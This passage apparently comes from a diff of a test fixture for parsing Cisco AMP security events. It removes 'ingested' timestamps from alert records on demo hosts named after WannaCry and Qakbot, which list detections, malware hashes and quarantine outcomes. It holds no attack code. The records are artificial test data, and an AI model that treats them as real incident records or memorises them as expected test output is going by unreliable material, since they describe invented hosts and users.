\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":768,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "severity": 2 @@ -4169,7 +4119,6 @@ ], "code": "1090519054", "id": "6419303565650559000", - "ingested": "2022-02-02T05:52:43.212765732Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":399000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419303565650558977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":768,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "severity": 2 @@ -4258,7 +4207,6 @@ "action": "Policy Update", "code": "553648130", "id": "6412662859016176000", - "ingested": "2022-02-02T05:52:43.212766555Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662859016176000,\"timestamp\":1610651432,\"timestamp_nanoseconds\":199000000,\"date\":\"2021-01-14T19:10:32+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "severity": 0 @@ -4314,7 +4262,6 @@ "action": "Policy Update", "code": "553648130", "id": "6412662854721208000", - "ingested": "2022-02-02T05:52:43.212767377Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662854721208000,\"timestamp\":1610651431,\"timestamp_nanoseconds\":856000000,\"date\":\"2021-01-14T19:10:31+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "severity": 0 @@ -4382,7 +4329,6 @@ ], "code": "2164260893", "id": "6412662850426241000", - "ingested": "2022-02-02T05:52:43.212768192Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":233000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241035\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "severity": 3 @@ -4458,7 +4404,6 @@ ], "code": "2164260893", "id": "6412662850426241000", - "ingested": "2022-02-02T05:52:43.212769024Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241034\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "severity": 3 @@ -4534,7 +4479,6 @@ ], "code": "2164260893", "id": "6412662850426241000", - "ingested": "2022-02-02T05:52:43.212769858Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241033\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "severity": 3 @@ -4608,7 +4552,6 @@ ], "code": "553648147", "id": "6412662850426241000", - "ingested": "2022-02-02T05:52:43.212770671Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241035\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"el2j9fcqj.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\el2j9fcqj.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "severity": 3 @@ -4688,7 +4631,6 @@ ], "code": "553648147", "id": "6412662850426241000", - "ingested": "2022-02-02T05:52:43.212771500Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241034\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"kepv86368.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\kepv86368.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "severity": 3 @@ -4768,7 +4710,6 @@ ], "code": "553648147", "id": "6412662850426241000", - "ingested": "2022-02-02T05:52:43.212772327Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241033\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"uqlq0o884.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\uqlq0o884.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "severity": 3 @@ -4850,7 +4791,6 @@ ], "code": "2164260880", "id": "6419281601187807000", - "ingested": "2022-02-02T05:52:43.212773143Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281601187807000,\"timestamp\":1610647435,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T18:03:55+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419281601187807332\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 @@ -4928,7 +4868,6 @@ ], "code": "1090519054", "id": "6419281601187807000", - "ingested": "2022-02-02T05:52:43.212773954Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281601187807000,\"timestamp\":1610647435,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T18:03:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419281601187807332\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "severity": 2 @@ -5027,7 +4966,6 @@ ], "code": "1090519054", "id": "6419281588302905000", - "ingested": "2022-02-02T05:52:43.212774762Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281588302905000,\"timestamp\":1610647432,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T18:03:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419281588302905443\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "severity": 2 @@ -5124,7 +5062,6 @@ ], "code": "553648143", "id": "6419281588302905000", - "ingested": "2022-02-02T05:52:43.212775578Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281588302905000,\"timestamp\":1610647432,\"timestamp_nanoseconds\":927000000,\"date\":\"2021-01-14T18:03:52+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419281588302905443\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 @@ -5200,7 +5137,6 @@ ], "code": "2164260893", "id": "6411538569722069000", - "ingested": "2022-02-02T05:52:43.212776545Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411538569722068995\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "severity": 3 @@ -5276,7 +5212,6 @@ ], "code": "2164260893", "id": "6411538569722069000", - "ingested": "2022-02-02T05:52:43.212777392Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411538569722068994\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "severity": 3 @@ -5348,7 +5283,6 @@ ], "code": "553648155", "id": "6411538569722069000", - "ingested": "2022-02-02T05:52:43.212778201Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411538569722068993\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "severity": 3 @@ -5422,7 +5356,6 @@ ], "code": "553648147", "id": "6411538569722069000", - "ingested": "2022-02-02T05:52:43.212779221Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068995\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"igvj$vN.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\igvj$vN.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "severity": 3 @@ -5502,7 +5435,6 @@ ], "code": "553648147", "id": "6411538569722069000", - "ingested": "2022-02-02T05:52:43.212780078Z", "kind": "alert", "original": 